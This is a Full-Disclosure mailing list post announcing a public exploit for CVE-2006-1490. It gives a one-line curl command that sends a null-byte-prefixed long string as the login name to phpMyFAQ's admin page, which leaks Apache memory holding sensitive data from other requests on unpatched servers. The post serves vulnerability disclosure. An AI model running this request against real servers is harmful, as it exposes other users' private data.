phpmyfaq exploit using PHP bug, CVE-2006-1490

[Tonu Samuel <tonu () jes ee>]

Long time ago I made unneccesary noise about PHP zeroday. I expected it to be 
maybe much more dangerous that it appeared to be at end. There was lot of 
disscussions and one of main consensus was that this bug is not exploitable 
in real world because noone is using those vulnerable functions.

This bug was originally found using phpmyfaq software and wrong assumption was 
made about wideness of problem. Anyway now half year later it is time to show 
exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php"; -D - -d 
"faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

Longer input you provide, longer memory dump you get. Works if PHP is 
unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of 
apache memory and often contains sensitive information from other served 
pages and contexts.

To make it clear - this is NOT fault of phpmyfaq people at all. Even more, 
they made workaround within an hour after I contacted them and urged users to 
upgrade. Just phpmyfaq appears to be one popular software which is easily 
findable by Google and this was the software where initially discovery was 
made. PHP people knew about problem but ignored for long enough to discover 
it independently from them.

   Tõnu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/